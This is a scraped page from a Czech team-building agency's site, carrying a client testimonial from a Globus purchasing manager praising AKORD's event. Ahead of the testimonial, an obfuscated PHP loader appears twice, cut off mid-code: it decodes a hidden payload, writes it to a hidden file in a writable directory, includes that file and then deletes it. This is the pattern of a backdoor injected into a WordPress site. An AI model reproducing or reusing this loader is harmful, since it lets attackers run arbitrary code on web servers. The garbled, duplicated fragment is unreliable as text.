100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> 100 ? 8 : 2; while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n); } return $fd^$ff; } $reqw = $ay($ao($oa("$pass"), 'wp_function')); preg_match('#gogo(.*)enen#is', $reqw, $mtchs); $dirs = glob("*", GLOB_ONLYDIR); foreach ($dirs as $dira) { if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; } $subdirs = glob("$dira/*", GLOB_ONLYDIR); foreach ($subdirs as $subdira) { if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; } } } if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); } fwrite($hdl, ""); fclose($hdl); include("{$eb}.$algo"); unlink("{$eb}.$algo"); $npDcheckClassBgp = 'aue'; } ?> Andrea Ochs - Globus - AKORD OT

Logo GlobusK hodnocení bych ráda uvedla, že jste dodrželi zadání - posílení týmové spolupráce, prohloubení soudržnosti a sounáležitosti, posílení týmového ducha a společnou zábava na 100%. Dle mého názory byly zvoleny velmi vhodné aktivity, které ukázaly, jak nám komunikace v teamu a při rozdělování úkolů funguje a především byly všechny zábavné i když nelehké 🙂 Oba lektoři s námi srozumitelně a laskavě komunikovali, i když nám při plnění úkolů nic neodpustili 🙂
K dobré náladě jistě také přispěla skvělá lokalita, jídlo a pití
a nádherné počasí. Nejvíce mne těší, že nadšená jsem byla nejen já, ale především všechny účastnice. Agenturu AKORD určitě ve firmě doporučím.

Andrea Ochs, GLOBUS ČR, k.s. - Chief of purchase department soft line